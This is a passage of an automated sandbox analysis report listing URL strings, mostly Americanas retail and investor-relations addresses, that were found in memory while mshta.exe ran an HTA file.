Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/exclusivo_app-desk-5c02896f8c53.png%
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/exclusivo_app-desk-5c02896f8c53.pngu
Source: mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484648425.00000000094C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444617125.00000000094C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458668902.00000000094C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/09/sec-brinquedos_esporte-e-lazer-destaque-desk
Source: mshta.exe, 00000000.00000003.25465970538.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426074668.0000000009C1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466101017.0000000003074000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479770165.0000000003075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422689063.0000000009C1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400515549.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438311238.0000000009C1C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384835381.0000000003018000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317721237.000000000678A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/09/sec-brinquedos_esporte-e-lazer-destaque-mob-
Source: mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484520243.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466101017.0000000003074000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479770165.0000000003075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400515549.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410037652.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384835381.0000000003018000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-imag
Source: mshta.exe, 00000000.00000003.25432265647.0000000009C58000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429855353.0000000009C57000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398339352.0000000009C53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io61a7e617b6b7eb47e55814ca-1a9c13c0deaeh
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484826803.000000000950E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411529883.0000000009507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://informacoes.anatel.gov.br/paineis/certificacao
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://informacoes.anatel.gov.br/paineis/certificacao-de-produtos/consulta-de-produtosL
Source: mshta.exe, 00000000.00000003.25462631431.0000000009447000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443295751.00000000093E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483889487.0000000009449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://itunes.apple.com/app/apple0
Source: mshta.exe, 00000000.00000003.25402504692.000000000AA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383700341.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404755230.000000000AB34000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462689449.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479387385.0000000003003000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488630378.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487224676.000000000AB42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488009024.000000000ABF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460663147.0000000003003000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386733593.0000000003003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logs-referer.s3-sa-east-1.amazonaws.com/image.jpeg?x-cm=lasa&x-ref=
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458620748.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484951411.0000000009561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logs-referer.s3-sa-east-1.amazonaws.com/image.jpeg?x-cm=lasa&x-ref=acessorios-8f96648a2579.p
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mars-v1-americanas-npf.b2w.io/rrserver/api/rrPlatform/recsForPlacements
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432134093.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25436128428.0000000009C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378109211.000000000ABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488441042.000000000AC66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nossaslojas.americanas.com.br/?chave=dk_ft_lojas
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://nossaslojas.americanas.com.br/?chave=o2o_hm_00_0_0_nossaslojas
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484145246.0000000009467000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401685590.000000000ABFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.0000000006766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nossaslojas.americanas.com.br/?chave=prf_hm_0_tt_9_lojas
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486097263.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410939908.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405121576.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378109211.000000000ABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://protecaodemarcas.americanas.io/
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ri.americanas.com/governanca
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405052073.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490393750.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://ri.americanas.com/governanca-corporativa/estatuto-codigos-e-politicas
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ri.americanas.com/governanca-corporativa/estatuto-codigos-e-politicasT
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://ri.americanas.io
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484648425.00000000094C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444617125.00000000094C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ri.americanas.iotsi?
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426074668.0000000009C1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422689063.0000000009C1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378109211.000000000ABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377868768.000000000ABA1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400654336.000000000ABAA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ri.lasa.com.br
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ri.lasa.com.brDCy
Source: mshta.exe, 00000000.00000003.25400515549.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488396530.000000000AC56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426109600.0000000006806000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479677159.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466400085.0000000003060000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 